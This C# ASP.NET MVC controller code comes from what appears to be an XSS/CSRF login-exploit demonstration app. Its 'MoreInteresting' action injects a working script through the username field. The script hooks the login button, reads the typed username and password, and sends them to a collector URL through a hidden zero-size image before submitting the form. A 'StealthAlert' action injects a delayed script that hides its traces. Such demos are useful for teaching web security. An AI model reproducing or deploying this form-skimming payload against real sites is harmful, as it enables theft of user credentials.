public ActionResult MoreInteresting(bool autorun)
{
var model = new LoginExploitViewModel();
model.Exploit = autorun;
model.UserName = @"
<script>
function submitForm() {
document.forms[0].submit();
}
function formPreSubmit() {
var username = document.getElementById('UserName').value;
var password = document.getElementById('Password').value;
var img = document.createElement('img');
img.src = 'https://localhost:6001/LoginExploit/ShowCat?' +
'u=' + encodeURIComponent(username) +
'&p=' + encodeURIComponent(password);
img.style= 'width:0px;height:0px;border:white 0px none;'
document.body.appendChild(img)
setTimeout(submitForm, 500);
}
document.addEventListener('DOMContentLoaded', function(event) {
document.getElementById('UserName').value = '';
document.getElementsByClassName('error')[0].innerHTML = '';
document.getElementById('login').onclick = formPreSubmit;
});
</script>";
return(View("Index", model));
}
public ActionResult Alert(bool autorun)
{
var model = new LoginExploitViewModel();
model.Exploit = autorun;
model.UserName = "******";
return(View("Index", model));
}
public ActionResult CSRF(bool autorun)
{
var model = new LoginExploitViewModel();
model.Exploit = autorun;
model.UserName = "******";
model.Password = "******";
return(View("Index", model));
}
public ActionResult StealthAlert(bool autorun)
{
var model = new LoginExploitViewModel();
model.Exploit = autorun;
model.UserName = @"
<script>
function DoIt() {
alert('Hello World');
}
document.addEventListener('DOMContentLoaded', function(event) {
document.getElementById('UserName').value = '';
document.getElementsByClassName('error')[0].innerHTML = '';
setTimeout(DoIt, 5000);
});
</script>";
return(View("Index", model));
}
